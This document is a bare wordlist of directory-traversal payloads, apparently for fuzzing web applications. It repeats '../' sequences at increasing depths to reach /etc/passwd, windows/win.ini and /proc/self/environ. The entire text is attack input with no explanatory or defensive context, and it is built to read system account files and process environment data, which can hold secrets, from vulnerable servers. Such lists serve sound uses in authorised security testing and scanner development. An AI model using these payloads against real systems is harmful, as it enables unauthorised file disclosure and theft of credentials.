../etc/passwd
../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../windows/win.ini
../../../../windows/win.ini
../../../../../../windows/win.ini
../../../../../../../windows/win.ini
../../../../../../../../windows/win.ini
../../../../../../../../../../windows/win.ini
../../../../../../../../../../../../windows/win.ini
../../../../../../../../../../../../../windows/win.ini
../proc/self/environ
../../../../proc/self/environ
../../../../../../proc/self/environ
../../../../../../../proc/self/environ
../../../../../../../../proc/self/environ
../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
